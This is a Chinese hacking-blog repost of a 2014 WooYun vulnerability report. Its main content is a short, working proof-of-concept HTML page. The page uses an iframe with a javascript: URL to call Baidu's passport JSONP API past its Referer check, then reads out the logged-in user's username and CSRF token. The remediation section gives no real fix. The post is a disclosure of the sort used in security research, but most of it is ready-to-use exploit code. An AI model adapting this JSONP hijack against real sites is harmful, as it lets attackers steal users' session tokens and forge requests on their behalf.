记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

JS跨域抓取已登录的百度用户用户名和csrf token

2014-05-29 00:35

用二哥的办法绕referer

<html>

<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

<body>

<script>

function test(obj){

document.write(obj.data.rememberedUserName+"你好,您的CSRF节操已掉。节操编号为"+obj.data.token);

document.end();

}

</script>

<iframe src='javascript:"<script src=\"https://passport.baidu.com/v2/api/?getapi&tpl=gxt&apiver=v3&class=login&logintype=dialogLogin&callback=parent.test\"></script>"'></iframe>

</body></html>

漏洞证明:

jsonp.jpg

修复方案:

小哥你懂的

知识来源: www.wooyun.org/bugs/wooyun-2014-062654

阅读:175898 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“JS跨域抓取已登录的百度用户用户名和csrf token”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云